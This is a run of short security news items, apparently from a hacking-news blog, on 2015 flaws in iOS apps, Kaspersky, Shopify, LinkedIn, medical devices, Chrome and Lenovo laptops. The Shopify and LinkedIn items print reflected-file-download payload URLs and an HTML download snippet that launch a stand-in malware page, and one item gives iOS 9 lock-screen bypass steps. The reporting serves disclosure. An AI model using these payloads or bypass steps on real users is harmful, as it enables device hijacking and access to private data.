vulnerability in iOS allowing attacker to upload malicious file

An arbitrary file upload vulnerability has been discovered in an iOS app that allows an attacker to deliver a malicious package during a file transfer operation.

The app is Photos in Wi-Fi v1.0.1, and the vulnerability, discovered by the Vulnerability Laboratory Research Team, allows remote attackers to upload a malicious file to the iOS device which could compromise the security of the iOS wifi app and allowing the attacker to take control.

The vulnerability is triggered when the user tries to upload a file from their ‘Camera Roll' to the app. Remote attackers are able to intercept the name of the file and use a live session to change the `filename` value to a web based SSH connection and upload a malicious arbitrary file.

Once the SSH connection is active, the uploaded file is then used by the attacker to request an `asset.php` file to execute the stored malicious file which allows the attacker to gain access into the iOS app.

Benjamin Kunz Mejri at Vulnerability Lab who discovered the bug, commented in an email toSCMagazineUK.com that they have logged over “400 zero-day bugs in apps” and have had “several discussions with Apple” regarding protecting the App Store.

Exploitation of remote web vulnerabilities requires no user interaction and no privileged web application user account which makes this a relatively easy attack to execute, according to Mejri.

Successful exploitation of the arbitrary file upload vulnerability results in web-server, web module, website and/or dbms compromise.

Google Security researcher reveals zero days Bug In Kaspersky

A security researcher at Google has discovered more zero-day exploits in Kaspersky's anti-virus software.

Tavis Omandy, the security researcher, discovered several vulnerabilities. One involved a security measure Kaspersky had used to randomise memory allocation so hackers could not so easily exploit their location. Unfortunately, the memory allocation was not random and Omandy effectively used a Windows DLL file, used to allow programs to share resources, to effectively execute an attack.

A zero-day vulnerability is an unaddressed and previously unknown vulnerability. Considered extremely dangerous, they are called zero-day vulnerabilities because upon discovery, developers have very little time, or ‘zero days', to fix the vulnerability that might be imminently exploited or may have already been exploited.

This news comes quickly after a security researcher found flaws in FireEye products over last weekend which can result in unauthorised file disclosure. Omandy himself discovered several security flaws earlier this month in Sophos and ESET software.

Kaspersky is producing a fix for the vulnerability and published an official statement, saying that “We would like to thank Mr. Tavis Omandy for reporting to us a buffer overflow vulnerability, which our specialists fixed within 24 hours of its disclosure.” 

They added that, “a fix has already been distributed via automatic updates to all our clients and customers”.

Tools Used For Hacking The "Hacking Team" Leaked

Tools Used For Hacking The "Hacking Team" Leaked

Two hacking groups with seemingly close relationship to China hacked an infamous security firm Hacking Team, known for its business with intelligence agencies of un-democratic regimes.

As exposed after an attack on an Italian cybersecurity firm recently, it is clear that two leading groups of hackers connected to China have been using their exploits. Their attacks aimed at areas such as aerospace and defense, telecommunications and healthcare, and energy. Hacking Team – the company that lost over 400GB of data to hackers – sells surveillance software to intelligence organizations from around the world. The tools they seem to use were made public after the attack.

The company itself doesn’t hold a high reputation. In 2012, it was given the title of “enemy of the Internet” by Reporters Without Borders. This was because, as mentioned above, the company provides surveillance and hacking tools to law enforcement and intelligence services to dozens of countries – not excluding regimes accused of serious crimes against humanity and abuses. The hacker groups published the stolen data online and subsequently these were subjected to the examination of cybersecurity experts.

It seems the criminals made use of the data and exploited its weaknesses. They took advantage of the vulnerabilities and got various information, hoarded by Hacking Team, leaked. This concerned mainly zero-day exploits. These kinds of vulnerabilities are known as software flaws that are not familiar even to their creators. This makes them very dangerous as it is almost impossible to protect against them.

“Zero-day exploits are extremely valuable to attack groups,” Bryce Boland, FireEye’s chief technology officer for Asia Pacific, told the South China Morning Post. “When we discover attackers using unknown exploits, we work with technology vendors to get them addressed quickly.”

He said that Hacking Team was playing with fire by stockpiling such exploits in the first place. “By design, stockpiling exploits maintains a vulnerable status quo. [It] also introduces a new risk that the exploits could be stolen and used by others,” he said. The Flash exploit was apparently sold to the company by an anonymous Russian hacker for US $45,000, according to an email included in the leaks.

It was initially believed that the two groups were not cooperating together. The latest evidence, however, suggests the contrary. Both of them were observed using Hacking Team’s zero-day exploits to pervert the generally popular software – Adobe Flash Player, claims FireEye. Its chief technology officer, Bryce Boland, said that zero-day exploits are of extreme value to hacking groups. “When we discover attackers using unknown exploits, we work with technology vendors to get them addressed quickly,” he said, according the South China Morning Post.

The groups managed to launch their attacks, even though Adobe issued a patch quickly after they had noticed the problem. In an interview for Italy’s newspaper La Stampa, the chief executive of Hacking Team, David Vincenzetti, conveyed that the leak could be used by terrorists.

“Sufficient code was released to permit anyone to deploy the software against any target of their choice,” said Vincenzetti. It is believed that a risk is not off the table since many users usually keep older versions of the software, even after the release of an update by operators.

Reflected file download vulnerability found on Shopify The e-commerce platform used to "Sale On Facebook"

Shopify is a multi-channel commerce platform that helps people sell online, in-store, and everywhere in between. The popular security researchers Davis Sopas at WebSegura has discovered a Reflected Filename Download vulnerability in the Shopify service. Sopas already sent a security report to Shopify explaining that it doesn’t need any authentication like access_token, api_key or even an account on Shopify.

The Reflected Filename Download vulnerability affects the app.shopify.com service, the expert explained that browsing the following link on Internet Explorer 9 and 8 browsers, it will show a download dialog with a file named track.bat. If the user launches the batch file it will run Google Chrome with a malicious web page, in this specific case shop just displayed a text, but it is clear that a bad actor could exploit it to carry on malicious activities.

https://app.shopify.com/services/signup/track.bat?callback=foobar&signup_page=http%3A%2F%2Fwww.shopify.com%2F%22||start%20chrome%20davidsopas.com/poc/malware.htm||&_=

Sopas observed that on other browsers like Chrome, Opera, Firefox, Android Browser and Chrome for Android latest versions the user needs to visit a webpage that will force the download by using the HTML5 <A DOWNLOAD> attribute:

“When the victim visits a specially crafted page with the code above and click the image it will show the download dialog and after downloading it will show that the file is coming from Shopify servers.” states Sopas in a blog post.

The Reflected Filename Download attacks are very insidious because victims usually don’t suspect that have been targeted by hackers, the malicious file they receive appears as offered for download by a trusted source, in this case Shopify website site.

Resuming a possible attack scenario is:

1. The attacker sends a link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
2. Victim clicks the link because it trust Shopify as source and downloads the file.
3. Once the file is executed the victims is hijacked

Sopas criticized the approach of the Shopify company that underestimated the security issue as visible in the timeline published by Sopas.

Timeline:

19-03-2015 Reported this security issue to Shopify
27-03-2015 No reply so I asked for a update
06-04-2015 First contact with Shopify which they reply that it’s being processed
15-04-2015 Shopify told me that this security issue is interesting and ask for more information
15-04-2015 I sent more information and new proof-of-concept
04-05-2015 I asked for a update (no reply)
15-06-2015 I asked for another update (no reply)
16-09-2015 I asked for another update
22-09-2015 Since April without any email from Shopify they replied that they were working on fixing more urgent issues and consider mine a low impact and low priority
23-09-2015 I told them that it’s not a social engineering issue but they still don’t understand it
23-09-2015 Shopify told me that their prioritization is not up for discussion and not patching any time soon.

Vulnerability In "Medical Device" Allow Hackers To Access Device Online

Thousands of critical medical systems, such as MRI machines, are available for hackers to access online, according to researchers.

Some 68,000 medical systems from a large unnamed US health group have been exposed, they said.

Security researchers Scott Erven and Mark Collao presented their findings at hacker conference "Derbycon".

They also revealed that they had created fake medical devices which attracted thousands of hackers.

Interfaces connected to medical systems were available via search engine Shodan, the researchers told conference-goers.

Also see:

Use Shodan Search Engine To Discover Internet Of Things(Device connected to internet)

The researchers used Shodan - a search engine specifically for internet-connected devices - to look for exposed software from a range of health treatment providers, such as radiology and paediatric clinics, as well as one large healthcare organisation.

They told tech news website the Register that they ended up with "thousands of misconfigurations and direct attack vectors".

Such information would allow attackers to build up details on health organisations, including exact information about where medical devices were housed, they added.
                                                

Then it would be a case of "crafting an email and sending it to the guy who has access to that device with a payload that will run on the machine", Mr Collao said.

Presenting their findings at hacking conference Derbycon, the researchers said they had reported dozens of vulnerabilities to big-name medical device manufacturers over the last year.

The pair also ran an experiment to illustrate how hackers were already targeting medical devices.

For six months, they ran fake MRI and defibrillator machines in the form of software which act like the real devices.

The two fake machines attracted tens of thousands of login attempts and some 299 attempts to download malware, the researchers said.

The fact that their "honeypot" devices attracted so much interest suggests that medical devices are a target for hackers, said security researcher Ken Munro.

He emphasised the need to make the real-life versions more secure.

"Medical devices should not be available on the public internet. They should be behind multiple layers of protection," he said.

"Based on their research, we can see that hackers will have a go at devices that are clearly critical medical systems. That is scary, if unsurprising.

"What is even scarier is that the research shows that some medical devices have already been compromised."

Security Expert Of Cloud Flare Observed DDos Attack By "Exploiting Mobile Ad Network"

CloudFlare firms revealed that one of its customers was recently hit by a distributed denial-of-service (DDoS) attack that appeared to leverage a mobile ad network and malicious JavaScript.The experts explained that the DDoS attack relied on a JavaScrip that generates legitimate HTTP requests.

Unfortunately, this kind of DDoS attack is being popular in the hacking community, in April security researchers from the University of California at Berkeley and the University of Toronto have discovered a powerful weapon of the Chinese Government cyber arsenal, dubbed the Great Cannon, used to hit websites with powerful DDoS attacks. The Great Cannon has been used by Chinese authorities to knock-out two anti-censorship GitHub pages and it can be also used as a hacking tool to silently install malware on the targeted machine.

Also See: DDos attack on github bring down the site for several hours

The experts explained that the Great Cannon relies on malicious JavaScript injected into unencrypted traffic in order to carry on DDoS attacks.

Another similar DDoS attack was unveil last week, experts at Imgur discovered that a vulnerability in the platform was exploited by attackers to target the imageboards 4chan and 8chan.

Now, CloudFlare noticed a large number of HTTP requests addressing one of its customer’s website, the DDoS attack peaked at over 1 billion requests per hour. The experts observed a total of 4.5 billion requests reaching the content delivery network’s servers on the day of the attack.

The overall number of unique IP addresses originating the requests is 650,000, 99.8 percent these are from China.

Experts at CloudFlare said,nearly 80 percent of the requests were from mobile devices.

“Attacks like this form a new trend,” states a blog post published by CloudFlare. “They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.” explained the researcher Marek Majkowski.

CloudFlare researchers excluded that the DDoS attack was conducted by injecting TCP packets like observing in the DDoS attack conducted by the Great Cannon.

CloudFlare provided the following description for the attack scenario:

• A user was casually browsing the Internet or opened an app on the smartphone.
• The user was served an iframe with an advertisement.
• The advertisement content was requested from an ad network.
• The ad network forwarded the request to the third-party that won the ad auction.
• Either the third-party website was the “attack page”, or it forwarded the user to an “attack page”.
• The user was served an attack page containing a malicious JavaScript which launched a flood of XHR requests against CloudFlare servers.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski added.

Here's How Yahoo! Maintain The Privacy Of User

Yahoo was recognized by the Electronic Frontier Foundation(EFF) for its security and maintaining privacy in concern to user data. The EFF recognized Yahoo’s for publication of a transparency report, its demand of a warrant before hand over user-data to the government authority and promise to aware|inform users prior to handing over user data to goverment.

Yahoo associate general counsel,Aaron Altschuler said:

“As always, we will continue our efforts to protect our users’ information from unclear, improper, overbroad or unlawful government requests"

Yahoo opposing mass surveillance and enabled https encryption across major web services like yahoo mail,yahoo search engine for encrypting user data.For protecting the data of user,company rolls out the end-to-end encryption on it's mail server.

Yahoo also published its transparency report for the first half year.As per report, the government requests for data on its users are up as compare to the last six months of 2014.
Yahoo received 5,221 government requests for user data out of which company disclosed the data of only 1,258 of those requests.

In March, Yahoo reported the data of last six months of 2014, and said 4,865 total requests received from the U.S. requesting a total of 9,752 user accounts and the company provided details of 1,157 cases.Yahoo provided the non-content data for 3,174 of the cases. Non-content data is information provided by users at the time of  registering the account with Yahoo. That data includes the provided user’s name, IP address and other user details.

The company also received 227 global emergency disclosure requests, which happen when governments seek information in emergency situations that could involve danger of death or serious physical injury.  percent of those requests were followed.

Make The "TOR Connection" Exit Node More Secure Using Simple Script

To make the exit node of Tor more secure,"dustyfresh" published the open source tool on github called "nw.js".

This script allow the user to request the new exit node for Tor connection which make the Tor connection more secure.

Dustyfresh said,"I made a simple nw.js app just to test the concept of making an application that would allow you to control the onion router and request a new exit node / identity."

Tor is a anonymous way to  access the internet without being monitored.No one can track it back to you,However there is certain limitation and risks in "Exit node of TOR".When user requested for particular webpage on internet using TOR network then it goes through several randomly selected relays before exiting the Tor network.The last TOR relay,where traffic leaves the TOR network and and trying to connect open network is called Exit Node.

This prevent your ISP and website to know the IP Address and location of actual user.They can see the ip address and location of "exit node".So by this way "exit node" in TOR network can be monitored.

In other words,the last node where user leaves the tor relay and connect to open network can be monitored as shown in below image:

As per researcher,data transmitted using SSL and TLS is encrypted but it can be intercepted because addressing wrapper in SSL and TLS is unencrypted.However Tor hides the sender and receiver information.Even the relays don’t know who requested the traffic they’re passing along.

Tor relay means donating some of your computer's bandwidth to send and receive data on the Tor network. According to the Tor Project, the only requirement is having Internet bandwidth of 50 kilobytes (not kilobits) per second — about 10 percent of standard cable-modem bandwidth.

280 Pirate Websites Blocked In Russia due to Copyright Law

Access to over 280 'pirate' websites has been restricted in Russia since the introduction of AN amended copyright law in 2013. Additionally to The Pirate Bay and the huge Ukrainian file-hosting website EX.ua, streaming sites as well as Primewire are affected. Next week rightholders are going to apply for leading native torrent website RUTracker to be blocked forever.

Following intense pressure from each native and international rightsholders, simply over the past 2 years Russia took necessary steps towards cracking down on net piracy.

August 1, 2013, saw the introduction of a fresh copyright law that provided rightsholders with a mechanism to possess sites blocked by ISPs if they are not responding to takedown requests in a period of 72 hours.

Reporting on the past two years of activity, native telecoms watchdog Roscomnadzor has currently disclosed the extent to which the legislation has been utilized by rightsholders and what action has been taken.

“Since August, 2013, Roskomnadzor has received 189 complaints from rights holders. it's worth seeing that presently we tend to limiting the access to 282 sites that violate copyright and other relevant rights,” Roskomnadzor chief Alexander Zharov told RIA.

Unsurprisingly the list includes The Pirate Bay, that had restrictions levied in June 2015 following a criticism from Mosfilm, one among the biggest European motion picture studios.

Other websites presently blocked consist of well-known motion picture streaming site Primewire. Ukraine-based file-hosting giant EX.ua is additionally affected, besides library sites flibusta.net loveread.ws, have combined web traffic of over forty million visitors per month. Sports streaming portal Livetv.sx, that reportedly attracts twenty seven million visits, is additionally restricted.

While blockades in Russia may be full, partial or upraised if cooperation is forthcoming, earlier this year authorities also made it clear that repeat offenders wouldn't be tolerated. Amendments to copyright law introduced on May 1 indicated what lay ahead.

“This development mean that the systematic violation of intellectual property rights will lead to sites providing access to pirated content being blocked forever,” the govt declared.

It currently seems that RUTracker, Russia’s most-visited torrent website, and well-known music portal ProstoPleer, have tested that promise to breaking point.

“A few days ago an plea was filed by an association of rightsholders that may lead to constant blocks on two of biggest pirate resources,” Roskomnadzor’s Zharov confirms.

Both RUTracker and Pleer were subjected to earlier copyright complaints however reportedly didn't agitate them as needed under the law. the present action comes from the National Federation of the Music Industry (NFMI), an association that that counts Sony, Universal, Warner and EMI among its members.

“We decided to file a testimony with the court soon,” says NFMI chief operating officer Leonid Agronov.

The music industry association said it tried to work-out with the sites in regards to the removal of pirated content but those discussions didn't yield any results. Countering, Pavel Rassudov from the native Pirate Party feels that blockades can prove ineffective.

““People learn the way to bypass these blocks, and therefore the increase in their number will solely result in a lot of frequent use of CGI proxies and therefore the Tor network,” Rassudov says.

How To Enable 3D Touch In Older iPHONE Device

3D Touch is the latest feature of iPhone 6s and 6s plus.It enable users carry out “Quick Actions” from the home screen.It allow user to perform the task even more faster than earlier.

Savvy jailbreakers launched a new free tweak called ForceTouchActivator, which tries to impersonate 3D Touch by using long presses to expand the functionality of older iPhone. Currently this tweaks is limited to carry out “Quick Actions” from the home screen by doing a long touch.

ForceTouchActivator is available through the BigBoss repository in Cydia.ForceTouchActivator needs to be configured in Activator as shown in the below screenshot:

Here’s a video demo of the tweak in action, courtesy TechMe0ut:

China spies on airline passengers with IMSI-catchers

John McAfee,The former owner of McAfee security firm said, about the ability of the Chinese government to spy on four airlines customer.

John McAfee has never revealed the names of the airlines and never explained how he got this information, but he explained the complete cyber espionage campaign.

First, he got an Android software that had the capability to detect “man in the middle attacks by devices that emulate legitimate cell phone towers, to hundreds of international travelers flying with four highly renowned airlines”.

The software tries to detect anomalies in the IMSI-catchers (International Mobile Subscriber Identity), something that manufacturers can’t hide.

The next question is, but what is an IMSI-catcher?

“IMSI-catchers are devices that emulate cell phone towers. They trick our smartphones into believing a cell tower suddenly appeared in close range and entices our phones to connect through it.”

If your mobile is caught by any IMSI-catchers, you are in trouble. Once you are connected to the fake cell tower a man-in-the-middle attack is performed, “the IMSI-catcher analyses our configuration and “pushes” the necessary software into our smartphones in order for some third party related to the IMSI catcher to take control.”

When traveler attempted to connect to the onboard internet, a module was pushed to the connecting smartphone that surreptitiously turned on the 3G or 4G communications (without displaying the corresponding icon). At that point, an onboard IMSI-catcher attempted to connect to the phone and compromise traveler’s devices.

After this step, it will be check if your mobile have already installed an Android APP called ”Silent Logging“, if not the application will be pushed to your device.

“Silent Logging” has the purpose of spying on you and uses the following permissions:

“After Silent Logging is activated, a spyware app is downloaded to the users’ smartphone that utilises the Silent Logging app, unless the phone is “physically wiped” by the manufacturer, this software remains forever.”

If you try to do a factory reset by your own be aware that the spyware will detect it and emulate that you are doing a factory reset.

Once you have this spyware installed your device will available for the government to check on you, reading emails, SMS, recording videos, voice,etc etc, and all is sent to China.

Access Photo and Contacts Of iOS 9 Without Pin

"Videosdebarraquito",A youtube user discovered a security flaw that let's anyone to see the photo and contacts of iOS 9 without password.

The vulnerability allows users to use Siri to access an iPhone owner’s private data, and it is very easy to exploit have access to data.

Here’s how it works:

On any PIN-protected iPhone device running iOS 9, enter an incorrect PIN four times. On the fifth attempt, enter just three numbers (iOS locks for 1 minute after five incorrect PIN attempts) and then hold down the home button to bring up Siri as you enter the fourth.

Video Demonstration

As you can see, this security hole allows anyone to access all of the private photos on a device, as well as all of the contacts. Bear in mind that throughout all of this, the phone is still locked.

Unfortunately, all of these users updated to iOS9 are vulnerable to a simple hack.

How To Protect iOS 9 Updated Device From Vulnerability 

All you have to do is disable access to Siri while the phone is locked by opening the Settings app and tapping “Touch ID & Passcode.” Then scroll to the “Allow access when locked” section and slide the toggle next to Siri to off. 

Siri is enabled by default on the lock screen though, so most users running iOS 9 are currently exposed.

Once Again,Pre-installed Spyware Found on Lenovo Laptops

A manufactory refurbished Thinkpad shipped with Windows 7 and a scheduler app that ran once daily, aggregating usage information regarding what you are doing along with your pc And exfiltrating it to an analytics company.

The fact that this was happening was buried deep within the user "agreement" that came with the machine.

This is the third preloaded spyware scandal to hit Lenovo this year: Initially it had been caught putting in Superfish, that grossly compromised user security by putting in a man-in-the-middle certificate into the OS system; then it got caught loading immortal, self-reinstalling crapware into a part of the BIOS reserved for custom drivers.

This latest scandal is especially noteworthy as a result of it impinges on Thinkpads, the rock-solid portable computer brand the Co. acquired from IBM.

But this kind of appalling behavior speaks to a serious defalcation in the company's management and calls into question the whole firm's policy and approach toward its customers.

The 21st century quip has it that if you are not paying for the product, you are the product. But with Lenovo machines this year, it looks that even though you're paying for the product, you are still the product.

The task that gave me pause is termed "Lenovo Customer Feedback Program 64". It had been running daily. As per the description in the task scheduler: "This task uploads Client's Feedback Program information to Lenovo".



The program that runs daily is Lenovo.TVT.CustomerFeedback.Agent.exe and it resides in folder C:\Program Files (x86)\Lenovo\Customer Feedback Program.
Other files in the folder were Lenovo.TVT.CustomerFeedback.Agent.exe.config, Lenovo.TVT.CustomerFeedback.InnovApps.dll and Lenovo.TVT.CustomerFeedback.OmnitureSiteCatalyst.dll.

According to Wikipedia, Omniture is an internet marketing and web analytics company, and SiteCatalyst (since renamed) is their software package as a service utilization for client-side web analytics.

So, whereas there might not be additional ads on ThinkPads, there's something keeping an eye on and tracking.

On the one hand this can be shocking as a result of the machines were refurbished and sold by IBM. On the other hand, considering Lenovo's recent history, it is not shocking in any respect.

Vulnerability Discovered In LinkedIn Could hijack Your Computer

A critical Reflected File Download Vulnerability in LinkedIn was discovered by Security researcher David Sopas of WebSegura. The following XHR request on Google Inspector on LinkedIn was discovered by him:

https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt

It seems a simple request made by websites to count how many shares their site have on the Linkedin network.

On trying a modified parameter in the request as below,

https://www.linkedin.com/countserv/count/share?url=”||calc||

returned the following response:

IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});

Obviously the url parameter wasn’t validated and it was reflected on the JSON file. The researcher was able to download the file, and by renaming it to .bat the calculator program in windows was executed. 

It was possible by just changing the path so it downloaded a batch file and run a different windows command.

https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||

IE8 downloaded automatically the batch file from linkedin.com. Other browsers downloaded it using HTML5 download attribute.

<div align="center"><a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;"><img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" />

Attack Scenario

· Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)

· Victim clicks the link and trusting where it came from (LinkedIn) he downloads it

· Victim runs the file and his computer it’s hijacked

 “A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on LinkedIn.” wrote Sopas in a blog post

RFD (Reflected File Download) vulnerability is a serious flaw where a malicious file is offered for download from a trusted website, in this case LinkedIn. In spite of the file contents (virus, malware, Trojan or exploits etc.) it is downloaded and the users get compromised. Users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine and include a popular, trusted domain and use a secure connection, but users still need to be cautious not to get tricked. After the Sopas reported this vulnerability LinkedIn has patched it.

Crash "Opera" Browser Tab By Pointing Cursur to Simple URL String

Andris Atteka a securtiy researcher was able to crash the Chrome browser with a simple URL string, which is given below::

http://biome3d.com/%%30%30

Even Opera browser is also vulnerable to the above vulnerability but in case of opera only Particuler Tab will Crashed,when user point the cursor on URL instead of whole browser.This vulnerability is limited to desktop version of opera only.When user point the cursor on URL,error as shown in below image will be displayed:

User Added a "Null Char" in URL string to crash the google chrome browser.User reported a crash bug in Google chrome (issue #533361).

In reply to the researcher, this Chrome crash Bug actually is a "DOS vulnerability" and not a security flaw,Chrome team said.

Even Mobile version of chrome application is vulnerable to the bug.

WeChat v6.2.5 For iOS Hacked, Everything Safe And Under Control, Says Tencent

China’s leading messaging application WeChat has been hacked, discovered 600 millions application users data. Tencent spoke out the issue on Friday and said that, it was hacked through a vulnerability in application which has already been patched.

The company has proposed an inquiry into the affairs and it seems that, no user data is compromised and virtual cash held in the Tenpay ewallets has not been stolen. 
This vulnerability only lies in iOS device having WeChat version 6.2.5 

As per Tencent’s blog post,

A security flaw, caused by an external malware, was recently discovered affecting iOS users only on WeChat version 6.2.5. This flaw has been repaired and will not affect users who install or upgrade WeChat version 6.2.6 or greater, currently available on the iOS App Store. 

Here are some important points about the situation.

1. The flaw, described in recent media reports, only affects WeChat v6.2.5 for iOS. Newer versions of WeChat (versions 6.2.6 or greater) are not affected.
2. A preliminary investigation into the flaw has revealed that there has been no theft and leakage of users’ information or money, but the WeChat team will continue to closely monitor the situation.
3. The WeChat tech team has extensive experience combating attempts to hack our systems. Once the security flaw was discovered, the team immediately took steps to secure against any theft of user information.
4. Users who encounter any issues can contact the team by leaving feedback in the “WeChat Team” WeChat account.

This is not the first incidence of this nature. Right at the end of last month, British police warned users of a scam on WeChat that tried to trick unwary users into purchasing gift cards or online shopping credit in favor of offline sexual services.

Similarly, last month CNBC report , stating that various mobile messaging application including WeChat were being used for malicious purposes, and could be allowing hackers to “steal sensitive information and send it back to a remote server.”

The past few months have seen a noticeable increase in the number of attacks on online websites and apps.

Also See: Hack wifi using social engineering technique(WPA and WPA2 Protected)